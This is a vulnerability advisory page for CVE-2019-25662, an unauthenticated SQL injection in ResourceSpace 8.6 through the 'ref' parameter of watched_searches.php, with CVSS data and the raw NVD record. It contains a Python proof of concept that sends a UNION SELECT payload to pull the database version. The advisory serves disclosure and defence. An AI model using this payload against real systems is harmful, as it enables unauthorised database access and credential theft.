Security Vulnerability Report
中文
CVE-2019-25662 CVSS 8.2 HIGH

CVE-2019-25662

Published: 2026-04-05 21:16:43
Last Modified: 2026-04-14 16:16:55
Source: [email protected]

Description

ResourceSpace 8.6 contains an SQL injection vulnerability that allows unauthenticated attackers to execute arbitrary SQL queries by injecting malicious code through the 'ref' parameter. Attackers can send GET requests to the watched_searches.php endpoint with crafted SQL payloads to extract sensitive database information including usernames and credentials.

CVSS Details

CVSS Score
8.2
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:montala:resourcespace:*:*:*:*:*:*:*:* - VULNERABLE
ResourceSpace <= 8.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 # PoC for CVE-2019-25662: ResourceSpace SQL Injection # Author: Security Analyst import requests def exploit(url): target = f"{url}/pages/watched_searches.php" # Malicious payload to test SQL injection (extracting database version) payload = "1' UNION SELECT 1,2,version(),4,5,6,7,8,9,10-- -" params = { "ref": payload } try: response = requests.get(target, params=params, timeout=5) if response.status_code == 200 and "mysql" in response.text.lower(): print(f"[+] Potential SQL Injection found at {target}") print(f"[+] Payload: {payload}") print(f"[+] Response snippet: {response.text[:200]}") else: print("[-] Exploit failed or target not vulnerable.") except Exception as e: print(f"[!] Error: {e}") if __name__ == "__main__": target_ip = input("Enter target URL (e.g., http://localhost): ") exploit(target_ip)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2019-25662", "sourceIdentifier": "[email protected]", "published": "2026-04-05T21:16:43.223", "lastModified": "2026-04-14T16:16:55.097", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "ResourceSpace 8.6 contains an SQL injection vulnerability that allows unauthenticated attackers to execute arbitrary SQL queries by injecting malicious code through the 'ref' parameter. Attackers can send GET requests to the watched_searches.php endpoint with crafted SQL payloads to extract sensitive database information including usernames and credentials."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 4.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:montala:resourcespace:*:*:*:*:*:*:*:*", "versionEndIncluding": "8.6", "matchCriteriaId": "92DF8FB7-78ED-4127-8207-7B42E33FFA0E"}]}]}], "references": [{"url": "https://www.exploit-db.com/exploits/46308", "source": "[email protected]", "tags": ["Exploit", "VDB Entry"]}, {"url": "https://www.resourcespace.com/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.resourcespace.com/get", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.vulncheck.com/advisories/resourcespace-sql-injection-via-watched-searches-php", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.